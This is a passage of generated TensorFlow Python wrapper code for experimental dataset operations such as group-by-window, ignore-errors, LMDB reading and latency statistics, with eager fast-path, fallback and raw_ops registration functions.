    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_group_by_window_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_group_by_window_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalGroupByWindowDataset", input_dataset=input_dataset,
        key_func_other_arguments=key_func_other_arguments,
        reduce_func_other_arguments=reduce_func_other_arguments,
        window_size_func_other_arguments=window_size_func_other_arguments,
        key_func=key_func,
        reduce_func=reduce_func,
        window_size_func=window_size_func,
        output_types=output_types,
        output_shapes=output_shapes,
        name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  # Re-read the attrs from the created op for gradient recording.
  _attrs = ("key_func", _op.get_attr("key_func"), "reduce_func",
            _op.get_attr("reduce_func"), "window_size_func",
            _op.get_attr("window_size_func"), "Tkey_func_other_arguments",
            _op.get_attr("Tkey_func_other_arguments"),
            "Treduce_func_other_arguments",
            _op.get_attr("Treduce_func_other_arguments"),
            "Twindow_size_func_other_arguments",
            _op.get_attr("Twindow_size_func_other_arguments"), "output_types",
            _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalGroupByWindowDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unwrap the one-element list.
  _result, = _result
  return _result
def ExperimentalGroupByWindowDataset(input_dataset, key_func_other_arguments, reduce_func_other_arguments, window_size_func_other_arguments, key_func, reduce_func, window_size_func, output_types, output_shapes, name=None):
  # Raw-op alias: forward every argument to the snake_case implementation.
  return experimental_group_by_window_dataset(
      input_dataset, key_func_other_arguments, reduce_func_other_arguments,
      window_size_func_other_arguments, key_func, reduce_func,
      window_size_func, output_types, output_shapes, name=name)
# Raw-op registration: reuse the snake_case docstring, hide the alias from
# generated docs, make it keyword-only, and export it under tf.raw_ops.
ExperimentalGroupByWindowDataset.__doc__ = experimental_group_by_window_dataset.__doc__
ExperimentalGroupByWindowDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalGroupByWindowDataset))
tf_export("raw_ops.ExperimentalGroupByWindowDataset")(ExperimentalGroupByWindowDataset)
def experimental_group_by_window_dataset_eager_fallback(input_dataset, key_func_other_arguments, reduce_func_other_arguments, window_size_func_other_arguments, key_func, reduce_func, window_size_func, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_group_by_window_dataset.

  Canonicalizes attributes, converts the inputs to eager tensors and runs
  the ExperimentalGroupByWindowDataset op through _execute.execute.
  """
  eager_ctx = ctx or _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_group_by_window_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(t, "output_types") for t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_group_by_window_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(s, "output_shapes") for s in output_shapes]
  # Captured-argument lists may mix dtypes; record the dtype lists as attrs.
  _attr_Tkey_func_other_arguments, key_func_other_arguments = _execute.convert_to_mixed_eager_tensors(key_func_other_arguments, eager_ctx)
  _attr_Treduce_func_other_arguments, reduce_func_other_arguments = _execute.convert_to_mixed_eager_tensors(reduce_func_other_arguments, eager_ctx)
  _attr_Twindow_size_func_other_arguments, window_size_func_other_arguments = _execute.convert_to_mixed_eager_tensors(window_size_func_other_arguments, eager_ctx)
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  flat_inputs = [input_dataset]
  flat_inputs.extend(key_func_other_arguments)
  flat_inputs.extend(reduce_func_other_arguments)
  flat_inputs.extend(window_size_func_other_arguments)
  op_attrs = ("key_func", key_func, "reduce_func", reduce_func,
              "window_size_func", window_size_func,
              "Tkey_func_other_arguments", _attr_Tkey_func_other_arguments,
              "Treduce_func_other_arguments",
              _attr_Treduce_func_other_arguments,
              "Twindow_size_func_other_arguments",
              _attr_Twindow_size_func_other_arguments,
              "output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(b"ExperimentalGroupByWindowDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs,
                             ctx=eager_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalGroupByWindowDataset", flat_inputs, op_attrs, results,
      name)
  # Single-output op: unwrap the one-element result list.
  return results[0]
def experimental_identity_indexed_dataset(size, name=None):
  r"""TODO: add doc.

  Wraps the `ExperimentalIdentityIndexedDataset` op.

  Args:
    size: A `Tensor` of type `uint64`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalIdentityIndexedDataset", name,
        _ctx._post_execution_callbacks, size)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the Python fallback.
      try:
        return experimental_identity_indexed_dataset_eager_fallback(
            size, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Convert the op status into the matching Python exception.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalIdentityIndexedDataset", size=size, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = None
  _execute.record_gradient(
      "ExperimentalIdentityIndexedDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unwrap the one-element list.
  _result, = _result
  return _result
def ExperimentalIdentityIndexedDataset(size, name=None):
  # Raw-op alias: forward to the snake_case implementation.
  return experimental_identity_indexed_dataset(size, name=name)
# Raw-op registration: reuse the snake_case docstring, hide the alias from
# generated docs, make it keyword-only, and export it under tf.raw_ops.
ExperimentalIdentityIndexedDataset.__doc__ = experimental_identity_indexed_dataset.__doc__
ExperimentalIdentityIndexedDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIdentityIndexedDataset))
tf_export("raw_ops.ExperimentalIdentityIndexedDataset")(ExperimentalIdentityIndexedDataset)
def experimental_identity_indexed_dataset_eager_fallback(size, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_identity_indexed_dataset.

  Runs the ExperimentalIdentityIndexedDataset op via _execute.execute
  instead of the C fast path.
  """
  eager_ctx = ctx or _context.context()
  size = _ops.convert_to_tensor(size, _dtypes.uint64)
  flat_inputs = [size]
  op_attrs = None
  results = _execute.execute(b"ExperimentalIdentityIndexedDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs,
                             ctx=eager_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalIdentityIndexedDataset", flat_inputs, op_attrs, results,
      name)
  # Single-output op: unwrap the one-element result list.
  return results[0]
def experimental_ignore_errors_dataset(input_dataset, output_types, output_shapes, name=None):
  r"""Creates a dataset that contains the elements of `input_dataset` ignoring errors.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalIgnoreErrorsDataset", name,
        _ctx._post_execution_callbacks, input_dataset, "output_types",
        output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the Python fallback.
      try:
        return experimental_ignore_errors_dataset_eager_fallback(
            input_dataset, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Convert the op status into the matching Python exception.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Validate and canonicalize list-valued attributes before building the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_ignore_errors_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_ignore_errors_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalIgnoreErrorsDataset", input_dataset=input_dataset,
        output_types=output_types,
        output_shapes=output_shapes,
        name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalIgnoreErrorsDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unwrap the one-element list.
  _result, = _result
  return _result
def ExperimentalIgnoreErrorsDataset(input_dataset, output_types, output_shapes, name=None):
  # Raw-op alias: forward to the snake_case implementation.
  return experimental_ignore_errors_dataset(
      input_dataset, output_types, output_shapes, name=name)
# Raw-op registration: reuse the snake_case docstring, hide the alias from
# generated docs, make it keyword-only, and export it under tf.raw_ops.
ExperimentalIgnoreErrorsDataset.__doc__ = experimental_ignore_errors_dataset.__doc__
ExperimentalIgnoreErrorsDataset = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIgnoreErrorsDataset))
tf_export("raw_ops.ExperimentalIgnoreErrorsDataset")(ExperimentalIgnoreErrorsDataset)
def experimental_ignore_errors_dataset_eager_fallback(input_dataset, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_ignore_errors_dataset.

  Validates the attributes, converts the input to a tensor, and runs the
  ExperimentalIgnoreErrorsDataset op via _execute.execute.
  """
  eager_ctx = ctx or _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_ignore_errors_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(t, "output_types") for t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_ignore_errors_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(s, "output_shapes") for s in output_shapes]
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  flat_inputs = [input_dataset]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  results = _execute.execute(b"ExperimentalIgnoreErrorsDataset", 1,
                             inputs=flat_inputs, attrs=op_attrs,
                             ctx=eager_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalIgnoreErrorsDataset", flat_inputs, op_attrs, results, name)
  # Single-output op: unwrap the one-element result list.
  return results[0]
def experimental_indexed_dataset_get(materialized, index, output_types, output_shapes, name=None):
  r"""TODO: add doc.

  Wraps the `ExperimentalIndexedDatasetGet` op.

  Args:
    materialized: A `Tensor` of type `resource`.
    index: A `Tensor` of type `uint64`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A list of `Tensor` objects of type `output_types`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalIndexedDatasetGet", name, _ctx._post_execution_callbacks,
        materialized, index, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the Python fallback.
      try:
        return experimental_indexed_dataset_get_eager_fallback(
            materialized, index, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Convert the op status into the matching Python exception.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Validate and canonicalize list-valued attributes before building the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_indexed_dataset_get' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_indexed_dataset_get' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalIndexedDatasetGet", materialized=materialized,
        index=index,
        output_types=output_types,
        output_shapes=output_shapes,
        name=name)
  _result = _op.outputs[:]
  # If the op produced no outputs, return the Operation itself.
  if not _result:
    return _op
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalIndexedDatasetGet", _inputs_flat, _attrs, _result, name)
  # Multi-output op: return the full list of output tensors.
  return _result
def ExperimentalIndexedDatasetGet(materialized, index, output_types, output_shapes, name=None):
  # Raw-op alias: forward to the snake_case implementation.
  return experimental_indexed_dataset_get(
      materialized, index, output_types, output_shapes, name=name)
# Raw-op registration: reuse the snake_case docstring, hide the alias from
# generated docs, make it keyword-only, and export it under tf.raw_ops.
ExperimentalIndexedDatasetGet.__doc__ = experimental_indexed_dataset_get.__doc__
ExperimentalIndexedDatasetGet = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIndexedDatasetGet))
tf_export("raw_ops.ExperimentalIndexedDatasetGet")(ExperimentalIndexedDatasetGet)
def experimental_indexed_dataset_get_eager_fallback(materialized, index, output_types, output_shapes, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_indexed_dataset_get.

  Validates the attributes, converts the inputs to tensors, and runs the
  ExperimentalIndexedDatasetGet op via _execute.execute.
  """
  eager_ctx = ctx or _context.context()
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_indexed_dataset_get' Op, not %r." % output_types)
  output_types = [_execute.make_type(t, "output_types") for t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_indexed_dataset_get' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(s, "output_shapes") for s in output_shapes]
  materialized = _ops.convert_to_tensor(materialized, _dtypes.resource)
  index = _ops.convert_to_tensor(index, _dtypes.uint64)
  flat_inputs = [materialized, index]
  op_attrs = ("output_types", output_types, "output_shapes", output_shapes)
  # One output tensor per entry in output_types.
  results = _execute.execute(b"ExperimentalIndexedDatasetGet",
                             len(output_types), inputs=flat_inputs,
                             attrs=op_attrs, ctx=eager_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalIndexedDatasetGet", flat_inputs, op_attrs, results, name)
  return results
def experimental_indexed_dataset_materialize(dataset, materialized, name=None):
  r"""TODO: add doc.

  Wraps the `ExperimentalIndexedDatasetMaterialize` op.

  Args:
    dataset: A `Tensor` of type `variant`.
    materialized: A `Tensor` of type `resource`.
    name: A name for the operation (optional).

  Returns:
    The created Operation.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalIndexedDatasetMaterialize", name,
        _ctx._post_execution_callbacks, dataset, materialized)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the Python fallback.
      try:
        return experimental_indexed_dataset_materialize_eager_fallback(
            dataset, materialized, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Convert the op status into the matching Python exception.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalIndexedDatasetMaterialize", dataset=dataset,
        materialized=materialized,
        name=name)
  # Zero-output op: return the Operation itself.  (The generated code
  # previously had unreachable `_result = None; return _result` lines after
  # this return; they have been removed.)
  return _op
def ExperimentalIndexedDatasetMaterialize(dataset, materialized, name=None):
  # Raw-op alias: forward to the snake_case implementation.
  return experimental_indexed_dataset_materialize(dataset, materialized,
                                                  name=name)
# Raw-op registration: reuse the snake_case docstring, hide the alias from
# generated docs, make it keyword-only, and export it under tf.raw_ops.
ExperimentalIndexedDatasetMaterialize.__doc__ = experimental_indexed_dataset_materialize.__doc__
ExperimentalIndexedDatasetMaterialize = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIndexedDatasetMaterialize))
tf_export("raw_ops.ExperimentalIndexedDatasetMaterialize")(ExperimentalIndexedDatasetMaterialize)
def experimental_indexed_dataset_materialize_eager_fallback(dataset, materialized, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_indexed_dataset_materialize.

  Runs the ExperimentalIndexedDatasetMaterialize op via _execute.execute.
  """
  eager_ctx = ctx or _context.context()
  dataset = _ops.convert_to_tensor(dataset, _dtypes.variant)
  materialized = _ops.convert_to_tensor(materialized, _dtypes.resource)
  flat_inputs = [dataset, materialized]
  # Zero-output op: execute for its side effect only.
  _execute.execute(b"ExperimentalIndexedDatasetMaterialize", 0,
                   inputs=flat_inputs, attrs=None, ctx=eager_ctx, name=name)
  return None
def experimental_iterator_get_device(resource, name=None):
  r"""Returns the name of the device on which `resource` has been placed.

  Args:
    resource: A `Tensor` of type `resource`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `string`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalIteratorGetDevice", name, _ctx._post_execution_callbacks,
        resource)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the Python fallback.
      try:
        return experimental_iterator_get_device_eager_fallback(
            resource, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Convert the op status into the matching Python exception.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalIteratorGetDevice", resource=resource, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = None
  _execute.record_gradient(
      "ExperimentalIteratorGetDevice", _inputs_flat, _attrs, _result, name)
  # Single-output op: unwrap the one-element list.
  _result, = _result
  return _result
def ExperimentalIteratorGetDevice(resource, name=None):
  # Raw-op alias: forward to the snake_case implementation.
  return experimental_iterator_get_device(resource, name=name)
# Raw-op registration: reuse the snake_case docstring, hide the alias from
# generated docs, make it keyword-only, and export it under tf.raw_ops.
ExperimentalIteratorGetDevice.__doc__ = experimental_iterator_get_device.__doc__
ExperimentalIteratorGetDevice = _doc_controls.do_not_generate_docs(_kwarg_only(ExperimentalIteratorGetDevice))
tf_export("raw_ops.ExperimentalIteratorGetDevice")(ExperimentalIteratorGetDevice)
def experimental_iterator_get_device_eager_fallback(resource, name=None, ctx=None):
  r"""Eager-mode slow path for experimental_iterator_get_device.

  Runs the ExperimentalIteratorGetDevice op via _execute.execute.
  """
  eager_ctx = ctx or _context.context()
  resource = _ops.convert_to_tensor(resource, _dtypes.resource)
  flat_inputs = [resource]
  op_attrs = None
  results = _execute.execute(b"ExperimentalIteratorGetDevice", 1,
                             inputs=flat_inputs, attrs=op_attrs,
                             ctx=eager_ctx, name=name)
  _execute.record_gradient(
      "ExperimentalIteratorGetDevice", flat_inputs, op_attrs, results, name)
  # Single-output op: unwrap the one-element result list.
  return results[0]
def experimental_lmdb_dataset(filenames, output_types, output_shapes, name=None):
  r"""TODO: add doc.

  Wraps the `ExperimentalLMDBDataset` op.

  Args:
    filenames: A `Tensor` of type `string`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
        _ctx._context_handle, _ctx._thread_local_data.device_name,
        "ExperimentalLMDBDataset", name, _ctx._post_execution_callbacks,
        filenames, "output_types", output_types, "output_shapes",
        output_shapes)
      return _result
    except _core._FallbackException:
      # The fast path rejected these inputs; retry via the Python fallback.
      try:
        return experimental_lmdb_dataset_eager_fallback(
            filenames, output_types=output_types, output_shapes=output_shapes,
            name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Convert the op status into the matching Python exception.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  # Validate and canonicalize list-valued attributes before building the op.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_lmdb_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_lmdb_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
        "ExperimentalLMDBDataset", filenames=filenames,
        output_types=output_types,
        output_shapes=output_shapes, name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalLMDBDataset", _inputs_flat, _attrs, _result, name)
  # Single-output op: unwrap the one-element list.
  _result, = _result
  return _result
def ExperimentalLMDBDataset(filenames, output_types, output_shapes, name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return experimental_lmdb_dataset(
      filenames, output_types, output_shapes, name=name)

# Share the documentation, then wrap for the keyword-only raw_ops export.
ExperimentalLMDBDataset.__doc__ = experimental_lmdb_dataset.__doc__
ExperimentalLMDBDataset = _doc_controls.do_not_generate_docs(
    _kwarg_only(ExperimentalLMDBDataset))
tf_export("raw_ops.ExperimentalLMDBDataset")(ExperimentalLMDBDataset)
def experimental_lmdb_dataset_eager_fallback(filenames, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.

  This is for function experimental_lmdb_dataset: executes the
  ExperimentalLMDBDataset op through the Python eager-execution path when the
  C fast path raised a FallbackException.
  """
  _ctx = ctx if ctx else _context.context()
  # Validate and canonicalize the list-valued attrs.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_lmdb_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_lmdb_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Convert the single input and execute the op (1 output expected).
  filenames = _ops.convert_to_tensor(filenames, _dtypes.string)
  _inputs_flat = [filenames]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"ExperimentalLMDBDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalLMDBDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_latency_stats_dataset(input_dataset, tag, output_types, output_shapes, name=None):
  r"""Records the latency of producing `input_dataset` elements in a StatsAggregator.

  Args:
    input_dataset: A `Tensor` of type `variant`.
    tag: A `Tensor` of type `string`.
    output_types: A list of `tf.DTypes` that has length `>= 1`.
    output_shapes: A list of shapes (each a `tf.TensorShape` or list of
      `ints`) that has length `>= 1`.
    name: A name for the operation (optional).

  Returns:
    A `Tensor` of type `variant`.
  """
  _ctx = _context._context or _context.context()
  if _ctx is not None and _ctx._thread_local_data.is_eager:
    # Eager mode: try the C fast path first.
    try:
      _result = _pywrap_tensorflow.TFE_Py_FastPathExecute(
          _ctx._context_handle, _ctx._thread_local_data.device_name,
          "ExperimentalLatencyStatsDataset", name,
          _ctx._post_execution_callbacks, input_dataset, tag, "output_types",
          output_types, "output_shapes", output_shapes)
      return _result
    except _core._FallbackException:
      # Fast path rejected the inputs; retry through the Python slow path.
      try:
        return experimental_latency_stats_dataset_eager_fallback(
            input_dataset, tag, output_types=output_types,
            output_shapes=output_shapes, name=name, ctx=_ctx)
      except _core._SymbolicException:
        pass  # Add nodes to the TensorFlow graph.
    except _core._NotOkStatusException as e:
      # Append the op name to the error message when one was supplied.
      if name is not None:
        message = e.message + " name: " + name
      else:
        message = e.message
      _six.raise_from(_core._status_to_exception(e.code, message), None)
  # Add nodes to the TensorFlow graph.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_latency_stats_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_latency_stats_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  _, _, _op = _op_def_lib._apply_op_helper(
      "ExperimentalLatencyStatsDataset", input_dataset=input_dataset,
      tag=tag, output_types=output_types, output_shapes=output_shapes,
      name=name)
  _result = _op.outputs[:]
  _inputs_flat = _op.inputs
  _attrs = ("output_types", _op.get_attr("output_types"), "output_shapes",
            _op.get_attr("output_shapes"))
  _execute.record_gradient(
      "ExperimentalLatencyStatsDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def ExperimentalLatencyStatsDataset(input_dataset, tag, output_types, output_shapes, name=None):
  # Raw-op alias: delegates directly to the snake_case implementation.
  return experimental_latency_stats_dataset(
      input_dataset, tag, output_types, output_shapes, name=name)

# Share the documentation, then wrap for the keyword-only raw_ops export.
ExperimentalLatencyStatsDataset.__doc__ = experimental_latency_stats_dataset.__doc__
ExperimentalLatencyStatsDataset = _doc_controls.do_not_generate_docs(
    _kwarg_only(ExperimentalLatencyStatsDataset))
tf_export("raw_ops.ExperimentalLatencyStatsDataset")(ExperimentalLatencyStatsDataset)
def experimental_latency_stats_dataset_eager_fallback(input_dataset, tag, output_types, output_shapes, name=None, ctx=None):
  r"""This is the slowpath function for Eager mode.

  This is for function experimental_latency_stats_dataset: executes the
  ExperimentalLatencyStatsDataset op through the Python eager-execution path
  when the C fast path raised a FallbackException.
  """
  _ctx = ctx if ctx else _context.context()
  # Validate and canonicalize the list-valued attrs.
  if not isinstance(output_types, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_types' argument to "
        "'experimental_latency_stats_dataset' Op, not %r." % output_types)
  output_types = [_execute.make_type(_t, "output_types") for _t in output_types]
  if not isinstance(output_shapes, (list, tuple)):
    raise TypeError(
        "Expected list for 'output_shapes' argument to "
        "'experimental_latency_stats_dataset' Op, not %r." % output_shapes)
  output_shapes = [_execute.make_shape(_s, "output_shapes") for _s in output_shapes]
  # Convert inputs to tensors and execute the op (1 output expected).
  input_dataset = _ops.convert_to_tensor(input_dataset, _dtypes.variant)
  tag = _ops.convert_to_tensor(tag, _dtypes.string)
  _inputs_flat = [input_dataset, tag]
  _attrs = ("output_types", output_types, "output_shapes", output_shapes)
  _result = _execute.execute(b"ExperimentalLatencyStatsDataset", 1,
                             inputs=_inputs_flat, attrs=_attrs, ctx=_ctx,
                             name=name)
  _execute.record_gradient(
      "ExperimentalLatencyStatsDataset", _inputs_flat, _attrs, _result, name)
  _result, = _result
  return _result
def experimental_map_and_batch_dataset(input_dataset, other_arguments, batch_size, num_parallel_calls, drop_remainder, f, output_types, output_shapes, preserve_cardinality=False, name=None):
  r"""Creates a dataset that fuses mapping with batching.

  Creates a dataset that applies `f` to the outputs of `input_dataset` and then
  batches `batch_size` of them.

  Unlike a "MapDataset", which applies `f` sequentially, this dataset invokes up
  to `batch_size * num_parallel_batches` copies of `f` in parallel.

  Args:
    input_dataset: A `Tensor` of type `variant`.
      A variant tensor representing the input dataset.
    other_arguments: A list of `Tensor` objects.
      A list of tensors, typically values that were captured when building a closure
      for `f`.
